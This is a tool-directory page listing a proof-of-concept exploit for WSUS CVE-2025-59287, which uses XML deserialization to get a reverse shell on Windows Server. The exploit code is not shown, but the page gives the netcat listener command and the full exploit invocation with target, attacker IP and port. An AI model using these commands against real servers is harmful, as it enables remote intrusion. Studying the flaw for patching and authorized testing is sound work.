Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/furkankayapinar/cve-2025-59287
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubfurkankayapinar/cve-2025-59287

CVE-2025-59287

PoC exploit for WSUS CVE-2025-59287 using XML deserialization to achieve a Windows reverse shell via SOAP and ObjectDataProvider.

View Repository
10 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-59287

WSUS CVE-2025-59287 – XML Deserialization RCE (Reverse Shell) A focused PoC to exploit WSUS CVE-2025-59287 via XML deserialization to achieve a Windows reverse shell. This script only supports a reverse shell payload (no calc fallback). Target: Windows Server with WSUS role Technique: SOAP + ObjectDataProvider deserialization Result: cmd.exe launches PowerShell reverse shell to your listener Disclaimer For authorized testing in lab environments only. You are responsible for complying with all applicable laws. Requirements Python 3.x Network access to WSUS endpoints (usually 8530/8531) Listener on your machine (e.g., nc)

Start listener

nc -lvnp 4444

Run exploit

python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug

-u: WSUS base URL (http/https, typically port 8530/8531) -l: Your IP to receive the shell -p: Your listener port --debug: Verbose output

Download Tool